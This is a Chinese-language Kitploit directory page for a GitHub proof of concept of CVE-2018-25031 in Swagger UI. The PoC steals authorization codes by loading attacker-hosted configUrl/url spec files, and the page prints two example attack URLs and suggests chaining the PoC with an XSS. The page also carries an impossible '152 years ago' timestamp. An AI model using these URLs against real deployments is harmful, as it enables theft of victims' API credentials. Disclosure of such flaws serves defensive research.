Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
POC-CVE-2018-25031 — CVE-2018-25031(Swagger UI XSS)的概念验证利用,通过精心构造的configUrl/url参数窃取授权码。 | Kitploit
工具/GitHubGitHub/geozin/poc-cve-2018-25031
钓鱼工具漏洞分析漏洞利用Web应用程序漏洞利用社会工程学
GitHubgeozin/poc-cve-2018-25031

POC-CVE-2018-25031

CVE-2018-25031(Swagger UI XSS)的概念验证利用,通过精心构造的configUrl/url参数窃取授权码。

查看仓库
152年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2018-25031 - Swagger UI 4.1.3 之前版本

一个简单的概念验证(CVE-2018-25031),诱使受害者输入授权码,然后该授权码被发送给攻击者。
你可以结合 XSS 漏洞 https://github.com/VictorNS69/swagger-ui-xss 使用它。

需要找到参数并指定正确的文件:对于 configUrl,是 JSON 文件;对于 url,是 YAML 文件。

示例:

root@kitploit:~
https://<URL>/?configUrl=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.json
https://<URL>/?url=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.yaml

截图:


当受害者尝试通过输入授权码来使用 API,并点击 Execute 时,他们不会看到任何显示。然而,一个包含授权码的请求将被发送到攻击者的 URL。

参考:

https://nvd.nist.gov/vuln/detail/CVE-2018-25031
https://github.com/mathis2001/CVE-2018-25031

下载工具